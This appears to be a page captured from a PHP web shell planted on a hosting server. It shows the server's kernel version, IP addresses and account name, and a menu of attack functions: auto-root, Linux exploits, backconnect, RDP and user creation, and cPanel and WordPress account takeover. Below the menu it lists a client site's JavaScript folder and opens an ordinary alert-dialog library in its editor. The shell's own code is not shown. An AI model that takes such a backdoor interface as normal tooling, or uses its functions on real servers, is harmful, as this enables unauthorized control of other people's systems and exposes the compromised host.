Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.133.116.59
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
designprovider /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
anijs-helper-scrollreveal.js
1016
B
-rw-r--r--
anijs.js
8.46
KB
-rw-r--r--
bootstrap.min.js
34.77
KB
-rw-r--r--
html5shiv.js
2.32
KB
-rw-r--r--
jquery-1.11.0.min.js
94.12
KB
-rw-r--r--
jquery-2.1.1.js
241.55
KB
-rw-r--r--
jquery-ui.js
450.57
KB
-rw-r--r--
jquery-ui.min.js
247.72
KB
-rw-r--r--
jquery.gridrotator.js
18.95
KB
-rw-r--r--
jquery.inview.min.js
1.39
KB
-rw-r--r--
jquery.isotope.min.js
15.66
KB
-rw-r--r--
jquery.js
90.92
KB
-rw-r--r--
jquery.min.js
84.68
KB
-rw-r--r--
jquery.prettyPhoto.js
21.54
KB
-rw-r--r--
loader.js
1.74
KB
-rw-r--r--
main.js
5.22
KB
-rw-r--r--
main1.js
6.13
KB
-rw-r--r--
modernAlert.js
11.5
KB
-rw-r--r--
modernAlert.min.js
5.32
KB
-rw-r--r--
modernizr.custom.26633.js
9.23
KB
-rw-r--r--
mousescroll.js
9.29
KB
-rw-r--r--
owl.carousel.min.js
22.49
KB
-rw-r--r--
respond.min.js
3.94
KB
-rw-r--r--
script.js
1.64
KB
-rw-r--r--
scrollreveal.js
32.74
KB
-rw-r--r--
slider.js
44.47
KB
-rw-r--r--
smoothscroll.js
6.44
KB
-rw-r--r--
video.js
50.63
KB
-rw-r--r--
wow.min.js
4.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modernAlert.min.js
/** * modernAlert - JavaScript snippet to override native js functions alert, confirm, prompt. * Native functions are replaced with customizable pop-ups. * * @author Sumit Singh * @version 1.1 **/ !function(){this.modernAlert=function(){var e={init:function(){if("object"==typeof arguments[0])for(var e in arguments[0])this.args.hasOwnProperty(e)&&(this.args[e]=arguments[0][e]);return this.head.insertBefore(this.getStyleTag(),this.head.firstChild),window.alert=this.alert,window.confirm=this.confirm,window.prompt=this.prompt,this},args:{backgroundColor:"#fff",color:"#555",borderColor:"#ccc",titleBackgroundColor:"#e8a033",titleColor:"#fff",defaultButtonsText:{ok:"Ok",cancel:"Cancel"},overlayColor:"rgba(0, 0, 0, 0.5)",overlayBlur:2},head:document.head||document.getElementsByTagName("head")[0],getStyleTag:function(){var e=document.createElement("style");return e.type="text/css",e.appendChild(document.createTextNode(this.getCSS())),e},getCSS:function(){var e=".modernAlertWrapper {background: "+this.args.backgroundColor+"; color: "+this.args.color+"; border: 1px solid "+this.args.borderColor+"; box-shadow: 0 0 5px rgba(0, 0, 0, 0.3); left: 50%; min-height: 120px; min-width: 240px; position: fixed; text-align: center; top: 50%; z-index: 999;font-size:14px;padding-bottom: 15px;}";return e+=".modernAlertWrapper h4 {background: "+this.args.titleBackgroundColor+"; color: "+this.args.titleColor+"; margin: 0; padding: 5px; font-size:16px;}",e+=".modernAlertWrapper p {margin: 0;padding: 5px 10px;}",e+=".maInputWrapper input {width: 100%; max-width: 300px;}",e+=".modernAlertOverlay {background: "+this.args.overlayColor+"; cursor: wait;height: 100%;left: 0;position: fixed;top: 0;width: 100%;z-index: 998;}",this.args.overlayBlur!==!1&&(e+="body.maActive > *:not(script):not(link):not(.modernAlertOverlay):not(.modernAlertWrapper) {-webkit-filter: blur("+this.args.overlayBlur+"px); filter: blur("+this.args.overlayBlur+"px);}"),e},extract_vars:function(e,t){t="undefined"!=typeof t?t:"confirm";var n=new Object;return n.msg=e[0]||"",n.title=e[1]||"Message","alert"===t?(n.extra_var="undefined"!=typeof e[2]?e[2]:"You can use this var by passing value as fourth parameter in confirm function.",n.buttons="object"==typeof e[3]?e[3]:this.args.defaultButtonsText):(n.callback="function"==typeof e[2]?e[2]:function(){console.warn("Callback function is missing!")},n.extra_var="undefined"!=typeof e[3]?e[3]:"You can use this var by passing value as fourth parameter in confirm and prompt function.",n.buttons="object"==typeof e[4]?e[4]:this.args.defaultButtonsText),n},generateId:function(){var e=(new Date).getTime();return"modernAlert"+e},alert:function(){var t,n,r;r=e.generateId(),t=e.extract_vars(arguments,"alert"),n="<h4>"+t.title+"</h4><p>"+t.msg+'</p><input class="button btn btn-default" onclick="modernAlert.close(\''+r+'\')" type="button" value="'+t.buttons.ok+'" />',window.modernAlert.addRemoveClass("maActive"),e.createInsertHtml("div","modernAlertOverlay","",!1,!0),e.createInsertHtml("div","modernAlertWrapper",n,r)},confirm:function(){var t,n,r,a,o,l;l=e.generateId(),t=e.extract_vars(arguments),n="<h4>"+t.title+"</h4><p>"+t.msg+'</p>\n <input class="button btn btn-default maYes" type="button" value="'+t.buttons.ok+'" />\n <input class="button btn btn-default maNo" type="button" value="'+t.buttons.cancel+'" />',window.modernAlert.addRemoveClass("maActive"),e.createInsertHtml("div","modernAlertOverlay","",!1,!0),r=e.createInsertHtml("div","modernAlertWrapper",n,l),a=r.getElementsByClassName("maYes"),o=r.getElementsByClassName("maNo"),a[0].onclick=function(){window.modernAlert.close(l),t.callback(!0,t.extra_var)},o[0].onclick=function(){window.modernAlert.close(l),t.callback(!1,t.extra_var)}},prompt:function(){var t,n,r,a,o,l,s;s=e.generateId(),t=e.extract_vars(arguments),n="<h4>"+t.title+"</h4><p>"+t.msg+'</p>\n <p class="maInputWrapper"><input class="maInput" type="text" value="" /></p>\n <input class="button btn btn-default maYes" type="button" value="'+t.buttons.ok+'" />\n <input class="button btn btn-default maNo" type="button" value="'+t.buttons.cancel+'" />',window.modernAlert.addRemoveClass("maActive"),e.createInsertHtml("div","modernAlertOverlay","",!1,!0),r=e.createInsertHtml("div","modernAlertWrapper",n,s),a=r.getElementsByClassName("maYes"),o=r.getElementsByClassName("maNo"),l=r.getElementsByClassName("maInput"),a[0].onclick=function(){window.modernAlert.close(s),t.callback(l[0].value,t.extra_var)},o[0].onclick=function(){window.modernAlert.close(s),t.callback(!1,t.extra_var)}},createInsertHtml:function(e,t,n,r,a){a="undefined"!=typeof a?a:!1,r="undefined"!=typeof r?r:!1;var o=document.createElement(e);return o.className=t,r!==!1&&(o.id=r),o.innerHTML=n,document.body.appendChild(o),a===!1&&(o.style.cssText="margin-left: -"+o.offsetWidth/2+"px; margin-top: -"+o.offsetHeight/2+"px;"),o}};return e.init(arguments[0])},this.modernAlert.close=function(e){var t=document.getElementsByClassName("modernAlertOverlay"),n=!1;window.modernAlert.addRemoveClass("maActive",!0),e&&(n=document.getElementById(e))&&n.remove(),"object"==typeof t[0]&&t[0].remove()},this.modernAlert.addRemoveClass=function(e,t,n){return"undefined"==typeof e?!1:(t="undefined"!=typeof t?t:!1,n="undefined"!=typeof n?n:document.body||document.getElementsByTagName("body")[0],void(t===!0?n.classList.remove(e):n.classList.add(e)))}}();
Close